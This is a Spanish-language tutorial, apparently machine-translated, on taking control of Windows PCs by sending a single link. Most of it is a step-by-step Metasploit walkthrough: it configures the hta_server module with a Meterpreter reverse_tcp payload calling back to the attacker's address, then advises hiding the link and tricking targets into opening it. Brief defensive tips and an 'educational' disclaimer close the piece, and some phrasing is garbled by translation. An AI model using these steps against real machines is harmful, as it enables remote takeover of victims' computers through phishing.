Tutoriales

Controle otras PC enviando un solo enlace

Los ciberataques aumentan cada día. Los atacantes están utilizando nuevos métodos para tomar el control de nuestros sistemas. Ahora los atacantes pueden atacar cualquier sistema Windows con solo enviar un enlace. ¿Qué hacer? ¿Necesitamos aprender a hacerlo? Entonces podemos protegernos de los ciberataques.

En el artículo de hoy, aprenderemos sobre una técnica y cómo estar seguros.

Estamos usando nuestro sistema Kali Linux para atacar nuestro sistema Windows. Primero, abrimos nuestra ventana de terminal en el sistema Kali Linux y abrimos la consola Metasploit con el siguiente comando:

msfconsole

Luego se abre Metasploit Framework frente a nosotros como podemos ver en la siguiente captura de pantalla:

Metasploit Framework msfconsole

Aquí podemos usar el siguiente comando para usar «HTA Web Server»:

use exploit/windows/misc/hta_server

Después de usar este comando, se cargará este módulo.

Utilice Exploit / Windows / Misc / hta_server

Este módulo aloja una aplicación HTML (HTA) que, cuando se abre, ejecuta una carga útil a través de Powershell. Cuando un usuario navega hasta el archivo HTA, IE le pedirá dos veces antes de ejecutar la carga útil. Vamos a usarlo.

Aquí debemos configurar lhost ya que sabemos que nuestro host de escucha es nuestra máquina Kali Linux. Entonces usamos la dirección IP de nuestro sistema de ataque aquí (dirección IP o ifconfig Comando para encontrarlo para una interfaz específica). Usamos la dirección IP de nuestra interfaz wlan0 con el siguiente comando:

set lhost 172.20.10.4

Ahora coloquemos el host del servidor en el mismo sistema con la misma dirección IP usando el siguiente comando:

set srvhost 172.20.10.4

Nuestra carga útil predeterminada está seleccionada (windows / meterpreter / reverse_tcp), por lo que lo mantendremos como predeterminado y configuraremos nuestro puerto (cualquier puerto no utilizado), p. B. Puerto 8222.

set lport 8222

La siguiente captura de pantalla muestra el proceso anterior.

Configurar el servidor Metasploit HTA

Ahora solo tenemos que Explotar para iniciar nuestro servidor HTA.

exploit

Ahora se iniciará nuestro servidor, como podemos ver en la siguiente captura de pantalla:

el servidor hta se está ejecutando

Podemos ver lo fácil que es alojar un servidor malicioso en nuestro sistema con solo usar unos pocos comandos. Ahora podemos enviar este enlace a cualquier sistema Windows de nuestra red. Podemos enviar este enlace de diferentes formas. La mejor manera es utilizar túneles de reenvío de puertos, ocultar el enlace y enviar un correo electrónico / SMS al objetivo utilizando una técnica de ingeniería social para convencer al objetivo de que abra el enlace. Abrimos esta URL directamente en nuestra computadora con Windows.

Archivo HTA ejecutado en una PC con Windows

Siempre que haga clic en el enlace, nuestro archivo HTA se descargará en su computadora. Si estás en «CORRER«, o guardarlo en archivos y luego ejecutarlo desde allí, tenemos la sesión de Meterpreter.

Comenzó Metasploit Asseassion

Una vez iniciada la sesión de Meterpreter, podemos hacer cualquier cosa con la computadora con Windows. Podemos correr por más Ayudar Mando.

  1. En primer lugar, no debemos abrir ningún enlace que hayamos recibido de extraños en correos electrónicos, SMS o mensajeros de redes sociales. Ni siquiera de personas conocidas, ya que los atacantes pueden falsificar la identificación de correo electrónico de cualquier persona.
  2. Si necesitamos abrir este tipo de enlace en todo momento, debemos utilizar entornos virtuales. Luego, cuando algo sucede, solo afecta a la máquina virtual, no a nuestro sistema personal principal.
  3. Conoce más sobre las nuevas técnicas: «Aprender cosas es la mejor opción para estar seguro». Bueno, esta cita funciona para todas las áreas, incluida nuestra vida.

Entonces pueden los ataques Atacanos simplemente enviando un enlace. No se requiere instalación para esto. También describimos cómo podemos estar a salvo de tales ataques.

Advertencia:- Atacar los dispositivos / redes de otros usuarios sin permiso es ilegal. Este artículo está escrito únicamente con fines educativos y de concientización. Aprenda cosas y manténgase seguro, aprender cosas no es ilegal, pero usar el conocimiento contra la ley es ilegal. Hemos demostrado cosas en los dispositivos / redes que poseemos.

¿Te encantan nuestros artículos? Siga nuestras instrucciones suscripción de correo electrónico gratuita para recibir todos nuestros artículos directamente en su bandeja de entrada. También estamos disponibles en Gorjeo y GitHub publicamos actualizaciones de artículos allí. Para unirse a nuestra familia, únase a la nuestra Grupo de telegramas. Estamos tratando de construir una comunidad para Linux y ciberseguridad. Siempre estamos felices de ayudar a todos en el como sección. Como sabemos, nuestra sección de comentarios siempre está abierta a todos. Leemos cada comentario y siempre respondemos.

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba